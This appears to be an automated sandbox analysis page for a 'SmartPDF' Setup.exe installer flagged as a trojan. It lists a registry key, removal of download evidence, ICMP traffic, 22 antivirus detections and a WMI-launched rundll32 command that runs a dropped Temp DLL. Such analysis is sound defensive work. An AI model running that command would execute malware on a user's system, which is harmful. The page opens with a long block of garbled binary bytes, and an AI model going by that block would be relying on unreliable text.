666Ûqïpí â¿%äåÐ¥ð"+¤ìJ £ %ËN ÊDLZ`` @Aõöà!@p=NøôPÞÖ]81UH©¤øó$Õ/îççÿúõ´)DdÆX'çÔXÁJ@ JN¥æÁAFz@úÁ+êÁ ÉÇÀúøú:ÁÊoªÇÏÕÉ>å ì ÇÜïeÞËÕ[ÒåÓcÞÈRÀ¬iû{¶xÇKâØþ~oxiXÅ@©uÌÌHHoÄÀï3úvóóáÉô{ÀÀúëÑÀèerßÒ'aFNÁÚþ"GÌ Á·ú£Ëÿó©â5h~'=øÀÃÖbhâá,Ìà3Åö"4öà!áÃ#ãÀfï¾äÀÃ èóûCu80xÅáHhÃ # /"öÁ ÅE À2RHcË¨ÅÙp0»»b%ºê': 8DÀHÃÆMH{þ%lêaèuMYP¢àÍèÑôÙK{éxòcéîzèØØã(5pòmôgèÁùÑéhêÛ]íjîóÑ°çêÚóç7_½å6ááú6êQ/þUÔILJxµE´dPbBF&HMÄúD ³¼E@@( tÌiÈÃ'¥ì yyûzö»¯MGQELwvÁÕ\$,@ÁåH4XHýP<PÁõX,(av((hÅ 78-ôÁJ±êôuSPÕá²Þb1sKàëPÙCÅö#Áo;0`8µøwdn"+@ öØ+cKCà'G¹»2ÐáIÁÎÿP,ñ¡IÁ%!¶+ËÜüA!D'}bw@Hmït´Ãçh X4ßÿPdH÷XlÁ KÁHÓ ®!@!`ÇDÇõ âRuE5ñ¦¡ÃæbB_ÇÂ'$_ÇÏÃ×xa!Ãv¶þQÃrÄ¥v5Âuy·"¸!!hÃD'âLÚY"æGiEH<9xßþ·RöÈAI IÃKé]P 4\AÔ!ÃÂiÏêÒQö[°ÀF-!Ll Ag¬~ú~B$Vù°àó<n¡óÕÄó«z3xH0KÓI5ê¡¥!mÝ;:1º tN[ñyê<1ãø%[çïü´±ä´t¨uü-10Ãö4:8.Ä÷ð ÿ$µËyàªHÈÂO é zbòu§·éìt·YG¿ê ßÈP·êPB+=D]\±çI·ÚÞÇÏ mÞäQj¨98#®MÊ{¸ÃaZ£elñ"ÆDµs»¯gXÌÿs8ÇÈKµ!PutÃÕ/£ÃÇëÈd 31Ro=GSm0Ãß»ë¨¥+hS,µÊ$ûÃ«nÍ÷vÀkÏx£Uh)_!¾8éêÜùµEµgMß¤HHDpXÅÉ`DPt`\|Á1?/v`A;ÇDgok'Æ<GÝyL//h\|ÁßÕ¶E?w³á!°8ÅÂàâÂÄ¤Ã·êXÿ´rf³µtX ò¼À!=^u[x4@ÅÒ?gsPzüßG)_@öæWû º½uÃÌOÈI@ÃápJRTÃÛC[ÃÄ¯È&nfNLÖôó+4otÉËv°QCÄHïê¨.ºd¯ùÆÛH@¢3ÁÇT@´/ÌA¶,}líáõãás÷ç#u´âO\|³Òá §ÐzØBÛ~ôKyÔù@/$Oh(Ãð:Æ¨¿âv\pPS+ÈókH{d¢#RgêêÇò ©Ôt$6ò+º¡âz^7[ôû´îççUÍW®qr`Òò¦¬UV1OíAfË+{ßûHØ)KjÞW8ow}yZKe@Ëoé%2Ë ÙAÅÁh1C/êA´ôEÏÕ\|§»ýÃÓÐu71FâÞïD¿-ýR_À0ôïìÉó³YÊC+JHEµ¬{1Æ»?p¶ó´ùêÈRëzfß'êÏz LDÇï!AH(¥þ¿ÔG@K7@ÇWÀâsÉÀúSwÆñjÙà¥-óÂõ¸£è{¼ÇiâHÃb`>8¹-EÍzðAÈÊkkÓM/rQ¶¯À[SEÄòkUÈxtÍ+ìBGù¨±¦ô C.9VHÃÎu\|Ç@Ä·úemÎMÁD`qÂ_Å;2vô÷ñ021³0ôÕý¤7ªE52xòÑÎu`ZÁõ+ÊBÃ@#ÔìÕô4xD,Ü®Vi4EzB¨ÔL(^N¤¦¢Ú9òþ]>¸~tERqÇgB¡}ðY¨8!Tÿ[HiÀiML7àÉ-â¹êP¨¦§à OÁ1+Ãº¶æÿ$Óº`îS<$p·G%Ü¶+ºÀcä<Í´6óãÅÌe%H@ÍL½yÏÜW9ûZ8ãZF$=JIÅh,[ÕHÁ"ê¿x MÅí(¸¹A"{ü¤T´Å²ã[;(¼\l+ «{òNÐq4K¹ó5J;ìàEwß¥Ãë¡Ì$Fs DËCÂ»ðø¥sùî[2zyuq7ó+î´µDúýÉÑ3a+óCUv×Æ)O4x(ë¢_,%lEabFoêû³S(IÊK%p?+Ð[s¼ÏIÅ4çX³ regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{LJU50KX1-5I52-VT6Q-WSWM-U2Z9XL21ZV61}\1	1	0	0

Attempts to remove evidence of file being downloaded from the Internet (1 event)

file	C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe:Zone.Identifier

Generates some ICMP traffic

File has been identified by 22 AntiVirus engines on VirusTotal as malicious (22 events)

DrWeb	Trojan.PWS.Stealer.29129
FireEye	Generic.mg.5578b9ee762d5257
Malwarebytes	Malware.AI.2457169706
CrowdStrike	win/malicious_confidence_60% (W)
BitDefenderTheta	Gen:NN.ZemsilF.34126.am0@a0vo38o
ESET-NOD32	multiple detections
APEX	Malicious
Kaspersky	UDS:Trojan-Downloader.Win32.Adload
Avast	Win32:RATX-gen [Trj]
Tencent	Win32.Trojan-downloader.Agent.Svho
McAfee-GW-Edition	GenericRXED-YZ!6AF7E6AFE782
Sophos	Generic ML PUA (PUA)
Avira	HEUR/AGEN.1137912
Microsoft	Trojan:Win32/Sabsik.TE.B!ml
Cynet	Malicious (score: 100)
McAfee	Artemis!5578B9EE762D
Cylance	Unsafe
SentinelOne	Static AI - Malicious PE
eGambit	Unsafe.AI_Score_99%
AVG	Win32:RATX-gen [Trj]
Cybereason	malicious.e890a5
MaxSecure	Trojan-Ransom.Win32.Crypmod.zfq

Uses WMI to create a new process (1 event)

Time & API	Arguments	Status	Return	Repeated
IWbemServices_ExecMethod Sept. 7, 2021, 11:57 a.m.	inargs.CurrentDirectory: None inargs.CommandLine: rUNdlL32.eXe "C:\Users\test22\AppData\Local\Temp\axhub.dll",main inargs.ProcessStartupInformation: None outargs.ProcessId: 2480 outargs.ReturnValue: 0 flags: 0 method: Create class: Win32_Process	1	0	0

SmartPDF.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All